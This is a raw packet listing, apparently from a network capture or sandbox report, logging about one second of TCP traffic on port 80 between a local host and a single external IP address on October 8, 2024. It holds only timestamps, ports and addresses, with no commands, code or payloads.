                                                            Oct 8, 2024 10:08:40.441456079 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.441463947 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.441473961 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.441498041 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.441519022 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.441531897 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.441557884 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.441575050 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.531594992 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.531780005 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.580863953 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.580996037 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.581032991 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.581058979 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.581085920 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.581123114 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.581127882 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.581127882 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.581156969 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.581156969 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.581176996 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.581192017 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.581212997 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.581226110 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.581237078 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.581260920 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.581278086 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.581294060 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.581314087 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.581327915 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.581351042 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.581361055 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.581384897 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.581394911 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.581413984 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.581430912 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.581444025 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.581465960 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.581481934 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.581518888 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.581525087 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.581558943 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.581578016 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.581592083 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.581614017 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.581635952 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.581644058 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.581676006 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.581693888 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.581710100 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.581727028 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.581743956 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.581763029 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.581779003 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.581799030 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.581814051 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.581832886 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.581867933 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.582123041 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.582155943 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.582176924 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.582190990 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.582211018 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.582225084 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.582240105 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.582267046 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.582273960 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.582300901 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.582319021 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.582336903 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.582351923 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.582389116 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.582417011 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.582448959 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.582468033 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.582483053 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.582495928 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.582535028 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.717081070 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.717124939 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.717161894 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.717189074 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.717196941 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.717190027 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.717230082 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.717258930 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.717258930 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.717264891 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.717284918 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.717300892 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.717309952 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.717350006 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.717463970 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.717497110 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.717515945 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.717531919 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.717545033 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.717566013 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.717577934 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.717602968 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.717614889 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.717633009 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.717658043 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.717678070 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.717690945 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.717720985 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.717740059 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.717762947 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.717772007 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.717806101 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.717819929 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.717839003 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.717854023 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.717874050 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.717890024 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.717907906 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.717924118 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.717942953 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.717957973 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.717977047 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.717994928 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.718010902 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.718023062 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.718060970 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.718206882 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.718240976 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.718276024 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.718285084 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.718285084 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.718384027 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.718384027 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.718417883 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.718435049 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.718453884 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.718489885 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.718492031 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.718512058 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.718540907 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.718554020 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.718588114 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.718604088 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.718637943 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.718744040 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.718794107 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.718807936 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.718842030 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.718857050 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.718892097 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.718924999 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.718964100 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.718982935 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.719000101 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.719016075 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.719050884 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.857295036 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.857364893 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.857424021 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.857430935 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.857430935 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.857460022 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.857495070 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.857508898 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.857508898 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.857539892 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.857547045 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.857580900 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.857600927 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.857614040 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.857629061 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.857647896 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.857659101 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.857681036 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.857698917 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.857728004 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.857736111 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.857769012 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.857789993 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.857803106 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.857819080 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.857836962 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.857848883 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.857870102 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.857889891 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.857904911 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.857920885 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.857944012 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.857954025 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.857992887 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.858395100 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.858429909 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.858450890 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.858464956 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.858475924 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.858500004 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.858515024 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.858549118 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.858551025 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.858598948 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.858601093 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.858634949 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.858649015 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.858666897 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.858686924 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.858700037 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.858710051 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.858732939 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.858748913 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.858767033 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.858779907 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.858800888 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.858814955 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.858834982 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.858850002 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.858869076 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.858887911 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.858902931 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.858916998 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.858949900 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.859989882 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.860025883 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.860044956 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.860079050 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.997486115 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.997559071 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.997594118 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.997617006 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.997617006 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.997627974 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.997663021 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.997687101 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.997687101 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.997693062 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.997713089 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.997742891 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.997745991 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.997781038 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.997796059 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.997831106 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.997832060 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.997867107 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.997880936 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.997899055 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.997919083 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.997932911 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.997941971 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.997982025 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.997983932 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998034000 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998035908 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998069048 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998086929 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998107910 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998116016 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998140097 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998157024 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998172998 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998186111 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998205900 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998220921 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998239994 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998259068 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998276949 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998290062 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998328924 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998651028 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998682976 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998716116 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998720884 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998722076 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998748064 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998763084 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998781919 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998797894 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998814106 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998828888 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998847961 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998863935 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998879910 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998898029 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998913050 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998929024 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998960972 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.999675989 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.999732971 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.999747038 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.999768019 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.999784946 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.999800920 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.999819994 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.999836922 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.999854088 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.999887943 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.133361101 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.133433104 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.133469105 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.133502007 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.133536100 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.133579969 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.133579969 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.133579969 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.133579969 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.133630991 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.133660078 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.133667946 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.133682966 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.133702040 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.133714914 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.133735895 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.133764029 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.133771896 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.133783102 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.133810043 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.133826971 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.133856058 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.135819912 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.135875940 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.135910034 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136003017 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136073112 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136125088 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136132002 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136159897 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136177063 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136194944 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136213064 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136229038 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136244059 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136277914 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136280060 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136313915 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136329889 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136347055 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136364937 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136382103 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136398077 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136415005 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136434078 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136464119 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136467934 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136501074 CEST804973080.66.75.114192.168.2.4
